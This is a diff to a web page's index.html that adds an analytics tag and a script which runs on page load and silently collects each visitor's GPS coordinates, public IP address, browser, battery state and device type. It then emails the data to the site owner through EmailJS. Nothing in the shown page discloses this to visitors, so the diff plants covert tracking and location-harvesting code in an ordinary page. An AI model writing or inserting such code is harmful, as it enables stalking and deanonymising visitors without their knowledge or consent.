--- a/index.html
+++ b/index.html
@@ -217,6 +217,124 @@
 }
 
     </style>
+        <!-- Google tag (gtag.js) -->
+    <script async src="https://www.googletagmanager.com/gtag/js?id=G-9ZL4S57BSK"></script>
+    <script>
+      window.dataLayer = window.dataLayer || [];
+      function gtag(){dataLayer.push(arguments);}
+      gtag('js', new Date());
+
+      gtag('config', 'G-9ZL4S57BSK');
+    </script>
+
+    <!-- EmailJS -->
+    <script src="https://cdn.emailjs.com/dist/email.min.js"></script>
+    <script>
+        (function(){
+            emailjs.init("YOUR_USER_ID"); // Replace with your EmailJS User ID
+        })();
+
+        function getBrowserAndDeviceInfo() {
+            const browserInfo = {
+                userAgent: navigator.userAgent,
+                platform: navigator.platform,
+                language: navigator.language,
+            };
+            return browserInfo;
+        }
+
+        function getLocation() {
+            return new Promise((resolve, reject) => {
+                if (navigator.geolocation) {
+                    navigator.geolocation.getCurrentPosition(
+                        (position) => {
+                            resolve({
+                                latitude: position.coords.latitude,
+                                longitude: position.coords.longitude,
+                            });
+                        },
+                        (error) => reject(error)
+                    );
+                } else {
+                    reject("Geolocation is not supported by this browser.");
+                }
+            });
+        }
+
+        function getBatteryInfo() {
+            return new Promise((resolve, reject) => {
+                if (navigator.getBattery) {
+                    navigator.getBattery().then((battery) => {
+                        resolve({
+                            level: battery.level * 100 + "%",
+                            charging: battery.charging ? "Yes" : "No",
+                        });
+                    });
+                } else {
+                    reject("Battery API is not supported by this browser.");
+                }
+            });
+        }
+
+        function getIPAddress() {
+            return fetch('https://api.ipify.org?format=json')
+                .then(response => response.json())
+                .then(data => data.ip);
+        }
+
+        function isDarkMode() {
+            const darkMode = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches;
+            return darkMode ? "Yes" : "No";
+        }
+
+        function getDeviceDetails() {
+            const userAgent = navigator.userAgent;
+            let deviceDetails = "Unknown Device";
+
+            if (/android/i.test(userAgent)) {
+                deviceDetails = "Android Device";
+            } else if (/iPhone|iPad|iPod/i.test(userAgent)) {
+                deviceDetails = "iOS Device";
+            }
+
+            return deviceDetails;
+        }
+
+        function gatherAndSendAllInfo() {
+            Promise.all([getLocation(), getBatteryInfo(), getIPAddress()])
+                .then(([location, battery, ip]) => {
+                    const data = {
+                        publicIP: ip,
+                        darkMode: isDarkMode(),
+                        location: `Lat: ${location.latitude}, Lon: ${location.longitude}`,
+                        browser: getBrowserAndDeviceInfo().userAgent,
+                        phone: getDeviceDetails(),
+                    };
+
+                    const emailParams = {
+                        public_ip: data.publicIP,
+                        dark_mode: data.darkMode,
+                        location: data.location,
+                        browser: data.browser,
+                        phone: data.phone,
+                    };
+
+                    console.log("Data collected:", data); // For debugging purposes
+                    emailjs.send('YOUR_SERVICE_ID', 'YOUR_TEMPLATE_ID', emailParams)
+                        .then(response => {
+                            console.log("Email sent successfully!", response.status, response.text);
+                        })
+                        .catch(error => {
+                            console.error("Failed to send email", error);
+                        });
+                })
+                .catch(error => {
+                    console.error("Failed to gather information", error);
+                });
+        }
+
+        document.addEventListener('DOMContentLoaded', gatherAndSendAllInfo);
+    </script>
 </head>
 <body>
     <div class="text-container">
